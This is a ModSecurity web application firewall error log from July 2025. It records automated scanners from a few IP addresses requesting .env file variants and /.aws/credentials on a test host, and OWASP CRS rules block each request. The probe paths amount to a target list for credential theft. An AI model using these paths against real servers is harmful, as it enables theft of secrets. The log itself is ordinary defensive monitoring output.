[Tue Jul 22 08:59:43.554235 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aH82341qVEbUREAWsaSSNQAAAAQ"]
[Tue Jul 22 08:59:43.554511 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aH82341qVEbUREAWsaSSNQAAAAQ"]
[Tue Jul 22 08:59:43.554698 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "aH82341qVEbUREAWsaSSNQAAAAQ"]
[Tue Jul 22 08:59:43.614186 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aH82341qVEbUREAWsaSSNgAAAAQ"]
[Tue Jul 22 08:59:43.614382 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aH82341qVEbUREAWsaSSNgAAAAQ"]
[Tue Jul 22 08:59:43.614615 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aH82341qVEbUREAWsaSSNgAAAAQ"]
[Tue Jul 22 08:59:43.614829 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aH82341qVEbUREAWsaSSNgAAAAQ"]
[Tue Jul 22 08:59:43.662095 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aH82341qVEbUREAWsaSSNwAAAAQ"]
[Tue Jul 22 08:59:43.662358 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aH82341qVEbUREAWsaSSNwAAAAQ"]
[Tue Jul 22 08:59:43.662554 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aH82341qVEbUREAWsaSSNwAAAAQ"]
[Tue Jul 22 08:59:43.749942 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aH82341qVEbUREAWsaSSOAAAAAQ"]
[Tue Jul 22 08:59:43.750196 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aH82341qVEbUREAWsaSSOAAAAAQ"]
[Tue Jul 22 08:59:43.750489 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aH82341qVEbUREAWsaSSOAAAAAQ"]
[Tue Jul 22 21:45:03.013949 2025] [:error] [pid 1366313] [client 155.94.155.152:37090] [client 155.94.155.152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH_qP41qVEbUREAWsaSSaAAAAAQ"]
[Tue Jul 22 21:45:03.014151 2025] [:error] [pid 1366313] [client 155.94.155.152:37090] [client 155.94.155.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH_qP41qVEbUREAWsaSSaAAAAAQ"]
[Tue Jul 22 21:45:03.014315 2025] [:error] [pid 1366313] [client 155.94.155.152:37090] [client 155.94.155.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH_qP41qVEbUREAWsaSSaAAAAAQ"]
[Wed Jul 23 18:17:05.863151 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIELAW6wfjR6tSMvn7_OygAAAAQ"]
[Wed Jul 23 18:17:05.864762 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIELAW6wfjR6tSMvn7_OygAAAAQ"]
[Wed Jul 23 18:17:05.864960 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIELAW6wfjR6tSMvn7_OygAAAAQ"]
[Wed Jul 23 18:17:06.378137 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIELAm6wfjR6tSMvn7_OzwAAAAQ"]
[Wed Jul 23 18:17:06.378422 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIELAm6wfjR6tSMvn7_OzwAAAAQ"]
[Wed Jul 23 18:17:06.378671 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIELAm6wfjR6tSMvn7_OzwAAAAQ"]
[Wed Jul 23 18:17:06.399121 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0AAAAAQ"]
[Wed Jul 23 18:17:06.399374 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0AAAAAQ"]
[Wed Jul 23 18:17:06.399602 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0AAAAAQ"]
[Wed Jul 23 18:17:06.419877 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIELAm6wfjR6tSMvn7_O0QAAAAQ"]
[Wed Jul 23 18:17:06.420244 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIELAm6wfjR6tSMvn7_O0QAAAAQ"]
[Wed Jul 23 18:17:06.420449 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aIELAm6wfjR6tSMvn7_O0QAAAAQ"]
[Wed Jul 23 18:17:06.519015 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0wAAAAQ"]
[Wed Jul 23 18:17:06.519282 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0wAAAAQ"]
[Wed Jul 23 18:17:06.519511 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O0wAAAAQ"]
[Wed Jul 23 18:17:06.545518 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIELAm6wfjR6tSMvn7_O1AAAAAQ"]
[Wed Jul 23 18:17:06.545679 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIELAm6wfjR6tSMvn7_O1AAAAAQ"]
[Wed Jul 23 18:17:06.545926 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIELAm6wfjR6tSMvn7_O1AAAAAQ"]
[Wed Jul 23 18:17:06.546132 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aIELAm6wfjR6tSMvn7_O1AAAAAQ"]
[Wed Jul 23 18:17:06.629886 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIELAm6wfjR6tSMvn7_O1gAAAAQ"]
[Wed Jul 23 18:17:06.630150 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIELAm6wfjR6tSMvn7_O1gAAAAQ"]
[Wed Jul 23 18:17:06.630369 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aIELAm6wfjR6tSMvn7_O1gAAAAQ"]
